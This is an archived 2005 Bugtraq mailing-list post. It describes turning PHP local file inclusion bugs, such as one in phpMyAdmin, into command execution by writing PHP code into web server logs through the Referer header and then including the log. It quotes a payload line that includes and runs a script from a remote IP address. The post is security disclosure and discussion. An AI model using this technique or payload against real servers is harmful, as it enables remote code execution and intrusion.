using php local file include vulnerabilities for command execution

To: Bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
Subject: using php local file include vulnerabilities for command execution
From: Andreas Zeidler <az@xxxxxxx>
Date: Tue, 11 Oct 2005 18:34:15 +0200
Cc: Maksymilian Arciemowicz <max@xxxxxxxxxxxx>
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mutt/1.5.10i

hi,

this is a comment on the recent phpmyadmin vulnerability[1] discovered
by maksymilian arciemowicz.  i didn't really know where to post this,
so i hope this is the right place.

anyway, since i've used a file inclusion vulnerability in an older
version of phpmyadmin as a starting point for a security analysis last
weekend, and came up with a rather simple idea of how to use it for
unprivileged script execution of remote php code, i thought i'd post
this here.  actually i think this method could be used on any php-based
local include vuln, so i was wondering why i couldn't yet find anything
about it on the net...

okay, the problem with local file vulns is of course, that the contents
of the file being read are not evaluated.  but given php's include
statement the are -- if they contain a valid php statement.  now instead
of trying to upload a file containing php code (which wasn't possible in
my case), i ask myself if there was a way to use the server to create it
for me?

the idea that hit me before falling asleep was to send the code i needed
(like <?php include('http://xx.xx.xx.xx/script.php'); ?>) via the
referer string, this way having the web server write it into a file for
me, and in a second step simply use the already existent local file vuln
to read and the server's log file and this way execute the code.

of course this method doesn't always work.  php mustn't run in safe
mode, the web server has to log referer strings and the log files must
be accessible after privileges have been dropped.  since most people are
logging in combined format, i guess the last requirement is the most
critical one, but many logs are world-readable nevertheless.  also,
enabled url-based includes make things easier, but they're not stricly
necessary.

so, provided with a php local file vuln and readable log files,
executing arbitrary commands comes down to locating a suitable log file
to include.  with a little guessing and the ability to read files (i.e.
the server configuration) this is not too difficult.

that's it.  any comments and feedback about this is most welcome,
especially since this approach seems much too simple to not having been
used before.  maybe someone can just point me to an already existing
discussion about this... :)

regards,


andi

[1] http://www.securityfocus.com/bid/15053

-- 
zeidler it consulting - http://zitc.de/ - info@xxxxxxx
karl-kunger-str 59 - 12435 berlin - telefon +49 30 25563779
keine softwarepatente in europa! - http://noepatents.eu.org/

Attachment: signature.asc
Description: Digital signature

Follow-Ups:
- Re: using php local file include vulnerabilities for command execution
  - From: Andreas Zeidler

Prev by Date: [USN-200-1] Thunderbird vulnerabilities
Next by Date: MDKSA-2005:180 - Updated xine-lib packages fixes cddb vulnerability
Previous by thread: [USN-200-1] Thunderbird vulnerabilities
Next by thread: Re: using php local file include vulnerabilities for command execution
Index(es):
- Date
- Thread